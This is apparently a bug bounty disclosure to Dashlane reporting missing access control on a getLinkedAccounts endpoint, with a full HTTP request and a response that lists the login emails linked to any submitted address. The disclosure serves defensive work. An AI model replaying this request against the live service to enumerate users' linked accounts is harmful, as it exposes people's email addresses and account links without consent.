Missing Access Control(IDOR) To Know LinkedAccounts

Hello Team, While Digging your Application I Came to Endpoint Where I Was Able to Check Whether Email is been Used in Multiple Account's or not , And Also Email's Are Getting Leaked . You have Feature to Enter Email To get Token : {F105969} As you can see from the above Screenshot , I'm Logged in as ([email protected]) and i put the Email ([email protected]) For Getting Code's Which Means I Have Linked my Account into Another Account. --------------------------------------------------------------------------------------------------------------------------------------- Your Endpoint Request : POST /1/account/getLinkedAccounts HTTP/1.1 Host: www.dashlane.com User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: https://www.dashlane.com/business/try Content-Length: 31 Cookie: Connection: close [email protected] ---------------------------------------------------------------------------------------------------------------- Response : {"code":200,"message":"OK","content":{"logins":["[email protected]","[email protected]","[email protected]"]}} ------------------------------------------------------------------------------------------------------------------ From the Above Response You Can See into Which Which Accounts , Email Have been Linked. {F105970} Thanks! Best, Arbaz